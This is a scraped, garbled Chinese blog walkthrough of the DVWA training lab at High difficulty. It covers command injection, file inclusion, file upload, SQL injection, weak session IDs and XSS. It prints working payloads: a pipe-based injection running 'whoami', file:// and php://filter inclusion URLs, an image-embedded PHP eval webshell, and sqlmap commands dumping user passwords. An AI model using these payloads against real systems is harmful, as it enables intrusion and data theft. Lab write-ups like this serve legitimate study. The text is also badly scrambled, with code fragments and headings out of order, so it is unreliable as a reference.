![\"\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/03\/20260304141101-69a83d7532e0f.png\")
<\/li>\n\u96be\u5ea6\u7b49\u7ea7:High \u62a5\u544a\u8bf4\u660e:\u672c\u6587\u4e3a DVWA \u9776\u573a High \u96be\u5ea6\u4e0b17\u4e2a\u6f0f\u6d1e\u7684\u8be6\u7ec6\u6e17\u900f\u6d4b\u8bd5\u6b65\u9aa4,\u5305\u542b\u6f0f\u6d1e\u539f\u7406\u3001\u5229\u7528\u65b9\u6cd5\u3001\u5de5\u5177\u64cd\u4f5c\u53ca\u6838\u5fc3Payload,\u5168\u7a0b\u57fa\u4e8eBurp Suite\u3001Sqlmap\u7b49\u5de5\u5177\u5b9e\u73b0,\u6240\u6709\u64cd\u4f5c\u6b65\u9aa4\u5747\u914d\u5957\u5b9e\u64cd\u622a\u56fe https:\/\/www.cnblogs.com\/wrold<\/p>\n
High \u96be\u5ea6\u65b0\u589e\u65f6\u95f4\u5ef6\u8fdf+user_token \u9a8c\u8bc1,token \u660e\u6587\u663e\u793a\u5728\u524d\u7aef\u9875\u9762,\u9700\u52a8\u6001\u63d0\u53d6 token \u914d\u5408\u7206\u7834\u3002<\/p>\n
<\/li>\n![\"\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/03\/20260304141101-69a83d754df07.png\")
<\/li>\n![\"\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/03\/20260304141101-69a83d755d5a3.png\")
<\/li>\n![\"\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/03\/20260304141101-69a83d756c4da.png\")
<\/li>\n![\"\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/03\/20260304141101-69a83d7594eef.png\")
![\"\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/03\/20260304141101-69a83d75ba9c4.png\")
<\/li>\n<\/ul>\n<\/li>\n![\"\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/03\/20260304141101-69a83d75e79a7.png\")
<\/li>\n![\"\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/03\/20260304141102-69a83d761a61f.png\")
<\/li>\n\u6293\u5305\u540e\u7981\u6b62\u63d0\u524d\u53d1\u5305,\u5426\u5219token\u4f1a\u5237\u65b0\u5bfc\u81f4\u7206\u7834\u5931\u8d25,\u9700\u4fdd\u8bc1\u521d\u59cbtoken\u4e0e\u7206\u7834\u8bf7\u6c42\u4e00\u81f4\u3002<\/p>\n
High \u96be\u5ea6\u5bf9\u7ba1\u9053\u7b26\u7b49\u547d\u4ee4\u5206\u9694\u7b26\u505a\u4e86\u9ed1\u540d\u5355\u8fc7\u6ee4,\u4f46\u8fc7\u6ee4\u4ee3\u7801\u5b58\u5728\u7a7a\u683c\u4e66\u5199\u9519\u8bef,\u5bfc\u81f4\u8fc7\u6ee4\u5931\u6548,\u53ef\u6784\u9020\u65e0\u7a7a\u683c\u7684\u547d\u4ee4\u62fc\u63a5Payload\u3002<\/p>\n
if<\/span>(<\/span>isset<\/span>(<\/span>$_POST<\/span>[<\/span>'Submit'<\/span>]<\/span>)<\/span>)<\/span>{<\/span> \u76f4\u63a5\u6784\u9020\u65e0\u7a7a\u683c\u7ba1\u9053\u7b26\u62fc\u63a5\u7684Payload,\u7ed5\u8fc7\u6ee4\u9ed1\u540d\u5355\u4f4d\u7f6e:<\/p>\n 127.0.0.1|whoami<\/p>\n \u63d0\u4ea4\u540e\u6210\u529f\u6267\u884c\u7cfb\u7edf\u547d\u4ee4,\u8fd4\u56de\u5f53\u524d\u7528\u6237\u4fe1\u606f\u3002 High \u96be\u5ea6\u65b0\u589euser_token \u9a8c\u8bc1,token \u660e\u6587\u663e\u793a\u5728\u524d\u7aefHTML\u6e90\u7801\u4e2d,\u5355\u7eaf\u6784\u9020CSRF\u94fe\u63a5\u65e0\u6cd5\u7ed5\u8fc7,\u9700\u914d\u5408XSS\u6f0f\u6d1e\u63d0\u53d6token\u540e\u7ec4\u5408\u653b\u51fb\u3002<\/p>\n High \u96be\u5ea6\u5bf9page\u53c2\u6570\u505a\u4e86\u5173\u952e\u8bcd\u767d\u540d\u5355\u8fc7\u6ee4(\u4ec5\u5141\u8bb8\u5305\u542bfile\/fie),\u4f46\u672a\u9650\u5236\u4f2a\u534f\u8bae,\u53ef\u901a\u8fc7file:\/\/\u4f2a\u534f\u8bae\u5b9e\u73b0\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u3002<\/p>\n $file<\/span>=<\/span>$_GET<\/span>[<\/span>'page'<\/span>]<\/span>;<\/span> \u6784\u9020file:\/\/\u4f2a\u534f\u8baePayload,\u6307\u5b9a\u672c\u5730\u6587\u4ef6\u7edd\u5bf9\u8def\u5f84,\u5b9e\u73b0\u4efb\u610f\u76ee\u5f55\u6587\u4ef6\u8bfb\u53d6:<\/p>\n http:\/\/dvwa:8564\/vulnerabilities\/fi\/?page=file:\/\/D:\/1.php<\/p>\n \u82e5\u670d\u52a1\u5668\u5f00\u542fphp:\/\/\u4f2a\u534f\u8bae\u76f8\u5173\u914d\u7f6e,\u53ef\u7ed3\u5408php:\/\/filter\u5b9e\u73b0\u6e90\u7801\u8bfb\u53d6:<\/p>\n http:\/\/dvwa:8564\/vulnerabilities\/fi\/?page=php:\/\/filter\/convert.base64-encode\/resource=index.php<\/p>\n High \u96be\u5ea6\u505a\u4e86\u591a\u91cd\u8fc7\u6ee4:\u6587\u4ef6\u7c7b\u578b\u6821\u9a8c\u3001\u6587\u4ef6\u5927\u5c0f\u9650\u5236\u3001getimagesize()\u56fe\u7247\u5934\u6821\u9a8c,\u65e0\u6cd5\u76f4\u63a5\u4e0a\u4f20webshell,\u9700\u5236\u4f5c\u56fe\u7247\u9a6c\u914d\u5408\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u5b9e\u73b0webshell\u6267\u884c\u3002<\/p>\n \/\/ \u6821\u9a8c\u6587\u4ef6\u540e\u7f00\u3001\u5927\u5c0f\u3001\u662f\u5426\u4e3a\u56fe\u7247<\/span> \u56fe\u7247\u9a6c\u5fc5\u987b\u4fdd\u7559\u5408\u6cd5\u56fe\u7247\u5934,\u5426\u5219getimagesize()\u4f1a\u68c0\u6d4b\u51fa\u975e\u56fe\u7247\u6587\u4ef6,\u5bfc\u81f4\u4e0a\u4f20\u5931\u8d25\u3002<\/p>\n High \u96be\u5ea6\u65b0\u589e\u4f1a\u8bdd\u5f39\u7a97\u9a8c\u8bc1,\u4f46\u6ce8\u5165\u6838\u5fc3\u903b\u8f91\u672a\u53d8,\u4ecd\u4e3a\u5b57\u7b26\u578b\u6ce8\u5165,\u53ef\u901a\u8fc7\u624b\u5de5\u6ce8\u5165\u6216Sqlmap\u5b9e\u73b0\u6570\u636e\u63d0\u53d6\u3002<\/p>\n \u7531\u4e8e\u6ce8\u5165\u7ed3\u679c\u5728\u7b2c\u4e8c\u4e2a\u9875\u9762\u5c55\u793a,\u9700\u4f7f\u7528–second-url\u53c2\u6570\u6307\u5b9a\u7ed3\u679c\u9875\u9762,\u547d\u4ee4\u5982\u4e0b:<\/p>\n # \u8bfb\u53d6\u6240\u6709\u6570\u636e\u5e93<\/span> High \u96be\u5ea6\u5728\u65f6\u95f4\u76f2\u6ce8\u4e2d\u52a0\u5165\u968f\u673asleep\u5ef6\u8fdf(rand(0,5)==3\u65f6\u89e6\u53d12-4\u79d2\u5ef6\u8fdf),\u5bfc\u81f4\u65f6\u95f4\u76f2\u6ce8\u5931\u6548,\u4ec5\u80fd\u4f7f\u7528\u5e03\u5c14\u76f2\u6ce8\u5b9e\u73b0\u6570\u636e\u63d0\u53d6\u3002 else<\/span> {<\/span> sqlmap -r<\/span> D:\\\\<\/span>Backup\\\\<\/span>\u684c\u9762\\\\<\/span>1<\/span>.txt –dbs<\/span> –batch<\/span> –second-url=<\/span>"http:\/\/dvwa:8564\/vulnerabilities\/sqli_blind\/"<\/span> –technique<\/span>=<\/span>B<\/p>\n \u8bf7\u6c42\u5305\u4e2d\u6709\u591a\u4e2a\u53c2\u6570\u65f6,\u907f\u514d\u540c\u65f6\u6807\u8bb0\u591a\u4e2a\u6ce8\u5165\u70b9,\u9010\u4e2a\u6d4b\u8bd5\u5b9a\u4f4d\u771f\u5b9e\u6ce8\u5165\u70b9(\u672c\u6b21\u4e3aCookie\u7684id\u53c2\u6570)\u3002<\/p>\n High \u96be\u5ea6\u7684dvwaSession\u53c2\u6570\u4e3aMD5\u52a0\u5bc6\u7684\u7b80\u5355\u6570\u5b57,\u53ef\u901a\u8fc7MD5\u89e3\u5bc6\u6784\u9020\u6709\u6548\u4f1a\u8bddID,\u5bfc\u81f4\u4f1a\u8bdd\u52ab\u6301\u3002<\/p>\n \u653b\u51fb\u8005\u53ef\u901a\u8fc7\u6784\u9020\u5f31\u4f1a\u8bddID,\u5192\u5145\u5176\u4ed6\u7528\u6237\u767b\u5f55\u7cfb\u7edf,\u83b7\u53d6\u654f\u611f\u4fe1\u606f\u3002<\/p>\n High \u96be\u5ea6\u5bf9default\u53c2\u6570\u505a\u4e86\u767d\u540d\u5355\u8fc7\u6ee4(\u4ec5\u5141\u8bb8French\u3001English\u3001German\u3001Spanish),\u975e\u767d\u540d\u5355\u503c\u4f1a\u88ab\u91cd\u5b9a\u5411,\u53ef\u901a\u8fc7**#\u53f7**\u7ed5\u8fc7\u670d\u52a1\u5668\u8fc7\u6ee4(\u670d\u52a1\u5668\u4e0d\u89e3\u6790#\u540e\u53c2\u6570,\u524d\u7aefDOM\u89e3\u6790)\u3002<\/p>\n if<\/span>(<\/span>array_key_exists<\/span>(<\/span>"default"<\/span>,<\/span>$_GET<\/span>)<\/span>&&<\/span>!<\/span>is_nulL<\/span>(<\/span>$_GET<\/span>[<\/span>'default'<\/span>]<\/span>)<\/span>)<\/span>{<\/span>
\n $target<\/span>=<\/span> trim<\/span>(<\/span>$_REQUEST<\/span>[<\/span>'ip'<\/span>]<\/span>)<\/span>;<\/span>
\n $substitutions<\/span> =<\/span> array<\/span>(<\/span>
\n \/\/ \u8fc7\u6ee4\u4ee3\u7801\u5b58\u5728\u591a\u4f59\u7a7a\u683c,\u5bfc\u81f4\u8fc7\u6ee4\u903b\u8f91\u5931\u6548<\/span>
\n )<\/span>;<\/span>
\n $target<\/span>=<\/span>str_replace<\/span>(<\/span> array_keys<\/span>(<\/span> $substitutions<\/span> )<\/span>,<\/span>$substitutions<\/span>,<\/span> $target<\/span> )<\/span>;<\/span>
\n if<\/span>(<\/span>stristr<\/span>(<\/span>php_uname<\/span>(<\/span>'s'<\/span>)<\/span>,<\/span>"Windows NT"<\/span>)<\/span>)<\/span>{<\/span>
\n $cmd<\/span>=<\/span>shell_exec<\/span>(<\/span>"ping "<\/span>.<\/span>$target<\/span>)<\/span>;<\/span>
\n }<\/span>else<\/span>{<\/span>
\n $cmd<\/span>=<\/span>shell_exec<\/span>(<\/span>"ping -c4 "<\/span>.<\/span>$target<\/span>)<\/span>;<\/span>
\n }<\/span>
\n $html<\/span>.=<\/span>"<pre>{<\/span>$cmd<\/span>}<\/span><\/span><\/pre>"<\/span>;<\/span>
\n}<\/span><\/p>\n![\"\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/03\/20260304141102-69a83d7640ae5.png\")
![\"\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/03\/20260304141102-69a83d76591c4.png\")
<\/p>\n\u5229\u7528\u65b9\u6cd5<\/h4>\n
![\"\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/03\/20260304141102-69a83d7668663.png\")
<\/p>\n
\n3. CSRF \u2014 \u8de8\u7ad9\u8bf7\u6c42\u4f2a\u9020<\/h3>\n
\u6f0f\u6d1e\u7279\u70b9<\/h4>\n
\u6f0f\u6d1e\u5206\u6790<\/h4>\n
![\"\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/03\/20260304141102-69a83d767d883.png\")
<\/li>\n![\"\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/03\/20260304141102-69a83d7698885.png\")
<\/li>\n\u653b\u51fb\u601d\u8def<\/h4>\n
\n4. File Inclusion \u2014 \u6587\u4ef6\u5305\u542b<\/h3>\n
\u6f0f\u6d1e\u7279\u70b9<\/h4>\n
\u6f0f\u6d1e\u4ee3\u7801\u5206\u6790<\/h4>\n
![\"\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/03\/20260304141102-69a83d76bd02c.png\")
<\/p>\n
\nif<\/span>(<\/span>!<\/span>fnmatch<\/span>(<\/span>"file,fie"<\/span>,<\/span>$file<\/span>)<\/span>&&<\/span>$file<\/span> !=<\/span>"include.php"<\/span>)<\/span>{<\/span>
\n echo<\/span> "ERROR:File not found!"<\/span>;<\/span>
\n exit<\/span>;<\/span>
\n}<\/span><\/p>\n\u5229\u7528\u65b9\u6cd5<\/h4>\n
![\"\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/03\/20260304141102-69a83d76d981a.png\")
<\/p>\n\u62d3\u5c55\u5229\u7528<\/h4>\n
\n5. File Upload \u2014 \u6587\u4ef6\u4e0a\u4f20<\/h3>\n
\u6f0f\u6d1e\u7279\u70b9<\/h4>\n
\u6f0f\u6d1e\u4ee3\u7801\u5206\u6790<\/h4>\n
![\"\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/03\/20260304141102-69a83d76e86d4.png\")
<\/p>\n
\nif<\/span>(<\/span>(<\/span>strtolower<\/span>(<\/span>$uploaded_ext<\/span>)<\/span> in<\/span> $allowed_ext<\/span>)<\/span>&&<\/span>(<\/span>$uploaded_size<\/span><<\/span>100000<\/span>)<\/span>&&<\/span>getimagesize<\/span>(<\/span>$uploaded_tmp<\/span>)<\/span>)<\/span>{<\/span>
\n \/\/ \u4e0a\u4f20\u6210\u529f\u903b\u8f91<\/span>
\n}<\/span><\/p>\n\u5229\u7528\u6b65\u9aa4<\/h4>\n
\ncopy 1.png \/b + shell.php \/a 11.png
\n \u56fe\u7247\u9a6c\u5185\u5bb9\u793a\u4f8b:<?php phpinfo();?>(\u6d4b\u8bd5\u7528)\/<?php @eval($_POST['pass']);?>(\u4e00\u53e5\u8bddwebshell)\u3002 ![\"\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/03\/20260304141103-69a83d77024cb.png\")
<\/li>\n![\"\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/03\/20260304141103-69a83d772674a.png\")
<\/li>\n
\n \u8bbf\u95ee\u540e\u6210\u529f\u6267\u884cphpinfo(),\u8bc1\u660e\u56fe\u7247\u9a6c\u751f\u6548\u3002 ![\"\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/03\/20260304141103-69a83d77462cf.png\")
<\/li>\n\u6838\u5fc3\u6ce8\u610f\u70b9<\/h4>\n
\n6. Insecure CAPTCHA \u2014 \u4e0d\u5b89\u5168\u7684\u9a8c\u8bc1\u7801<\/h3>\n
\n7. SQL Injection \u2014 SQL \u6ce8\u5165<\/h3>\n
\u6f0f\u6d1e\u7279\u70b9<\/h4>\n
\u5229\u7528\u6b65\u9aa4(\u624b\u5de5\u6ce8\u5165)<\/h4>\n
\n
![\"\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/03\/20260304141103-69a83d7758f1e.png\")
<\/li>\n![\"\"](\"2026-03-041z0rffkwtjf.png\")
![\"\"](\"2026-03-04n2mr2x00vyf.png\")
<\/li>\n<\/ul>\n<\/li>\n![\"\"](\"2026-03-04s4r4pbmhtnu.png\")
<\/li>\n\n
![\"\"](\"2026-03-04nh5w1wqev04.png\")
<\/li>\n<\/ul>\n<\/li>\n\u5229\u7528\u6b65\u9aa4(Sqlmap\u81ea\u52a8\u5316\u6ce8\u5165)<\/h4>\n
\nsqlmap -r<\/span> D:\\\\<\/span>Backup\\\\<\/span>\u684c\u9762\\\\<\/span>1<\/span>.txt –dbs<\/span> –batch<\/span> –second-url=<\/span>http:\/\/dvwa:8564\/vulnerabilities\/sqli\/
\n# \u8bfb\u53d6users\u8868\u6570\u636e<\/span>
\nsqlmap -r<\/span> D:\\\\<\/span>Backup\\\\<\/span>\u684c\u9762\\\\<\/span>1<\/span>.txt -D<\/span> dvwa -T<\/span> users<\/span> -C<\/span> user,password –dump<\/span> –batch<\/span> –second-url=<\/span>http:\/\/dvwa:8564\/vulnerabilities\/sqli\/<\/p>\n![\"\"](\"2026-03-04pibii0bjsvo.png\")
\u6267\u884c\u540e\u6210\u529f\u63d0\u53d6\u6570\u636e\u5e93\u4e2d\u6240\u6709\u8d26\u53f7\u548c\u52a0\u5bc6\u540e\u7684\u5bc6\u7801\u3002<\/p>\n
\n8. SQL Injection (Blind) \u2014 SQL \u76f2\u6ce8<\/h3>\n
\u6f0f\u6d1e\u7279\u70b9<\/h4>\n
![\"\"](\"2026-03-0443w5yvj1few.png\")
<\/p>\n\u6f0f\u6d1e\u4ee3\u7801\u5206\u6790<\/h4>\n
\n \/\/ \u968f\u673asleep,\u5e72\u6270\u65f6\u95f4\u76f2\u6ce8<\/span>
\n if<\/span>(<\/span>rand<\/span>(<\/span>0<\/span>,<\/span>5<\/span>)<\/span>==<\/span>3<\/span>)<\/span>{<\/span>
\n sleep<\/span>(<\/span>rand<\/span>(<\/span>2<\/span>,<\/span>4<\/span>)<\/span>)<\/span>;<\/span>
\n }<\/span>
\n}<\/span><\/p>\n\u5229\u7528\u6b65\u9aa4(Sqlmap\u81ea\u52a8\u5316\u5e03\u5c14\u76f2\u6ce8)<\/h4>\n
![\"\"](\"2026-03-045tlqaza0ab0.png\")
<\/li>\n![\"\"](\"2026-03-04jlp2mz1izzs.png\")
<\/li>\n\u6838\u5fc3\u6ce8\u610f\u70b9<\/h4>\n
\n9. Weak Session IDs \u2014 \u5f31\u4f1a\u8bdd ID<\/h3>\n
\u6f0f\u6d1e\u7279\u70b9<\/h4>\n
\u5229\u7528\u6b65\u9aa4<\/h4>\n
\u6f0f\u6d1e\u5371\u5bb3<\/h4>\n
\n10. XSS (DOM) \u2014 DOM \u578b\u8de8\u7ad9\u811a\u672c<\/h3>\n
\u6f0f\u6d1e\u7279\u70b9<\/h4>\n
\u6f0f\u6d1e\u4ee3\u7801\u5206\u6790<\/h4>\n
![\"\"](\"2026-03-04qybf3di0xna.png\")
<\/p>\n
\n switch<\/span>(<\/span>$_GET<\/span>[<\/span>'default'<\/span>]<\/span>)<\/span>{<\/span>
\n case<\/span> "French"<\/span>:<\/span>case<\/span> "English"<\/span>:<\/span>case<\/span> "German"<\/span>:<\/span>